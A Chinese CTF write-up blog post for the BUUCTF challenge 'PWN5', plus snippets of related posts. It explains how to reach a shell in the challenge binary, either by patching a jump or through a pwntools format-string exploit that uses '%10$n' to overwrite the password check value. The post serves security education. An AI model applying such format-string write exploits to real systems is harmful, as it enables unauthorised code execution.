buuctf之[第五空间2019 决赛]PWN5

最新推荐文章于 2024-09-27 19:50:51 发布
最新推荐文章于 2024-09-27 19:50:51 发布
阅读量737 收藏 13
点赞数 27
文章标签: 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54452942/article/details/137217998
版权

一、查看属性

首先还是必要的查看属性环节:

可以知道该文件是一个x86架构下的32位小段ELF程序,开启了栈不可执行(NX)保护和canary,ret2shellcode是不行的,正常的栈溢出也不行,要不就是格式化字符串,要不就是想办法绕过canary,这就比较麻烦了

执行一下是需要我们输入用户名密码

二、静态分析

放到ida中看看主函数主要是生成了一个随机数放在0x804c044位置,然后读取名称和密码,用密码和那个随机数比较,匹配成功输出“ok!!”并执行system("/bin/sh"),匹配失败输出“fail”

这样的话就用两个解题思路,栈溢出应该是没什么戏,但是可以用到printf的格式化字符串漏洞。毕竟它把我们的输入放在printf中又输出了一遍,或者就是既然是判断导致的有一条分支可能执行目标函数,那就直接修改源程序把判断取反来爆破(只适用于本地)

三、题解

1、爆破法:

可见是这里的“jz”指令使得程序有了左右两个分支,当我们随意输入使得条件判断不成功时,它会走左边输出“fail”,我们只需要修改“jz”为“jnz”就让程序在输入错误时走右边执行system函数

Edit->keypatch->patcher

Edit->Patch program -> apply patches to inputc file

修改后程序:

执行结果:成功!!!

2、格式化字符串漏洞

对于格式化字符串来解这个题就是找到我们的输入在栈空间中的位置,然后使用printf函数的%n功能向指定的地址空间写入我们可以控制的密码,然后输入密码使判断通过从而执行system

对于printf函数,我们举一个简单的例子,printf(“1234%3$n”)时就是将“4”写入了1234这个地址空间中

我们使用下面的exp尝试一下:

可见输出中在esp后第十个位置是printf可以控制的第一个栈地址空间,“aaaa”写入了那里

于是有下面代码:

from pwn import *

io = process('./pwn')

#io = gdb.debug('./pwn','break *0x8049288')

unk_addr = 0x804c044

payload = p32(unk_addr) + b'%10$n'

io.sendline(payload)

io.interactive()

运行:成功!!!

为萤
关注
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4618
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 403
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1586
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 3027
[第五空间2019 决赛]PWN5 ——两种解法
buuctf pwn [第五空间2019 决赛]PWN51
最新发布
m0_74125780的博客
09-27 356
然后将其放入ida32,查看main函数,幸运的发现有system。然后接下来就是理解这段反编译代码在讲什么,它的意思是它会随机生成一个4字节大小的数据,然后我们输入的passwd要与其相等。但是我们并不知道它随机生成的是什么,所以我们可以进行替换,将它随机生成的数替换成我们要输入的数。32位测输入点偏移,找到0x62626262(bbbb),数一下刚好是第10位。首先我们可以知道的是,随机生成的数据的开始地址0x804c044。首先用checksec检查一下,发现是32位的,还有栈保护。
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 839
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
[第五空间2019 决赛]PWN5
weixin_56301399的博客
07-21 1691
格式化字符串漏洞
buuctf [第五空间2019 决赛]PWN5
carol2358的博客
04-11 722
一道格式化字符串的题 先输入AAAA %08x %08x %08x %08x %08x %08x %08x········来确定输入首地址的偏移(找到41414141就是AAAA) 之后只要修改随机数的值,让输入和随机数的值一样就可以了 exp如下: from pwn import * context(log_level = 'debug',arch ='i386',os = 'linux' )...
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 1012
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 471
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 471
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 435
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 984
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 269
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值